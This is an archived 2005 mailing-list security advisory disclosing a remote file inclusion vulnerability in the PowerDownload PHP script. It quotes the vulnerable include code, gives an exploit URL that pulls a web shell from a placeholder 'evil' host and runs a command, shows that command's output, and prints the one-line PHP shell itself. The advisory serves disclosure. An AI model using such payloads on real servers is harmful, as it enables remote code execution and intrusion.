lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <bf9e91160505302005d75bdcc@mail.gmail.com>
Date: Tue, 31 May 2005 00:05:34 -0300
From: SoulBlack Group <soulblacktm@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	news@...uriteam.com, sec@...lblack.com.ar, bugs@...uritytracker.com,
	submissions@...ketstormsecurity.org, vuln@...unia.com,
	alerts_advisories@...-security.org
Subject: PowerDownload Remote File Inclusion


===========================================================

============================================================
Title: PowerDownload Remote File Inclusion.
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 31/05/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: v3.0.2 & v3.0.3
vendor: http://www.powerscripts.org/
============================================================

============================================================

* Summary *

PowerDownload is a PHP and mySQL based Download Script.

-------------------------------------------------------------

* Problem Description *

The bug reside in $incdir var in pdl-inc/pdl_header.inc.php

Vulnerable Code

// Include required Files
if(!isset($incdir)) $incdir = "";
require($incdir."pdl-inc/pdl_config.inc.php");
require($incdir."pdl-inc/pdl_db_class_".strtolower($config_sql_type).".inc.php");
require($incdir."pdl-inc/pdl_functions.inc.php");


/*

http://server/download/downloads.php?release_id=650&incdir=http://evil/cmd.gif?&cmd=uname%20-a

Linux webserver101 2.4.21-243-athlon #1 Thu Aug 12 15:24:15 UTC 2004 i686 athlon

*/

/*
-------
cmd.gif
-------

<?
system($cmd);
?>

*/

-------------------------------------------------------------


-------------------------------------------------------------

* Fix *

 Contact the Vendor.

-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ